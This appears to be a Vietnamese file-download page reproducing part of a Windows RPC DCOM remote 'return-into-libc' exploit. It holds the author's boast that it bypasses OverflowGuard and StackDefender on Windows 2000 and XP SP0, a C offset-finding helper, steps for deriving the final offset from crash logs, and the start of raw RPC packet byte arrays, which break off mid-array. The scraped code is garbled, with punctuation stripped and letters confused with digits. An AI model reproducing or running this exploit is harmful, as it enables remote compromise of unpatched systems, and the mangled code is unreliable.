Đang chuẩn bị liên kết để tải về tài liệu:
Rpc Remote Return-into-libc

Rpc Remote Return-into-libc Exploit code khai thác CODE /* * have you recently bought one of those expensive new windows security products * on the market? do you think you now have strong protection? * Look again: * * *rpc!exec* * by ins1der (trixterjack@yahoo.com) * * windows remote return into libc exploit! * * remote rpc exploit breaking non exec memory protection schemes * tested against : * OverflowGuard * StackDefender (kernel32 imagebase randomization:O nice try guys.) * * * currently breaking: * Windows 2000 SP0 (english) * Windows XP SP0 (english) * * to get new offsets use this:. | Rpc Remote Return-into-libc Exploit code khai thác CODE have you recently bought one of those expensive new windows security products on the market do you think you now have strong protection Look again rpc exec by ins1der trixterjack@yahoo.com windows remote return into libc exploit remote rpc exploit breaking non exec memory protection schemes tested against OverflowGuard StackDefender kernel32 imagebase randomization O nice try guys. currently breaking Windows 2000 SP0 english Windows XP SP0 english to get new offsets use this ---------------------- include windows.h include stdio.h int main HANDLE h1 h2 unsigned long addr1 addr2 addr3 addr4 h1 LoadLibrary ntdll.dll h2 LoadLibrary MSVCRT.dll addr1 unsigned long GetProcAddress h1 NtAllocateVirtualMemory addr2 unsigned long GetProcAddress h2 memcpy addr3 unsigned long GetProcAddress h1 NtProtectVirtualMemory for addr4 addr1 addr4 addr1 0xffff addr4 _ _ if memcmp void addr4 xc9 xc3 2 break printf 0x x 0x x 0x x 0x x n addr1 addr2 addr3 addr4 return 0 ---------------------- to get the last offset use a standard rpc dcom exploit with the last x90 x90 before the shellcode replaced with xcd x21. run the exploit and read the drwatson logs. substract 0xA5 from the fault address. Shouts go to w00pz SpaceCow Int3 lacroix misu200 j00 xor s0ny crisis and to all my true friends. Enjoy include sys socket.h include netinet in.h unsigned char bindstr 0x05 0x00 0x0B 0x03 0x10 0x00 0x00 0x00 0x48 0x00 0x00 0x00 0x7F 0x00 0x00 0x00 OxDO Ox16 Oxd0 Ox16 OxOO OxOO Oxo0 OxOO OxO1 Oxo0 Oxo0 OxOO OxO1 Oxo0 OxO1 Oxo0 0xa0 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0xC0 0x00 0x00 0x00 0x00 0x00 0x00 0x46 OxOO OxOO OxOO OxOO OxO4 Ox5D Ox88 Ox8A OxeB Ox1C Oxc9 Ox11 Ox9F Oxe8 Oxo8 Oxo0 0x2 B 0x10 0x48 0x60 0x02 0X00 0X00 0X00 unsigned char request1 0x05 0x00 0x00 0x03 0X10 0x00 0x00 0x00 0xE8 0x03 0x00 0x00 0xE5 0x00 0x00 0x00 0XD0 0X03 0X00 0X00 0X01 0X00 0X04 0X00 0X05 0X00 0X06 0X00 0X01 0X00 0X00 0X00 0x00 0x00 0x00 0x00 0x32 0x24 0x58 0xFD 0xCC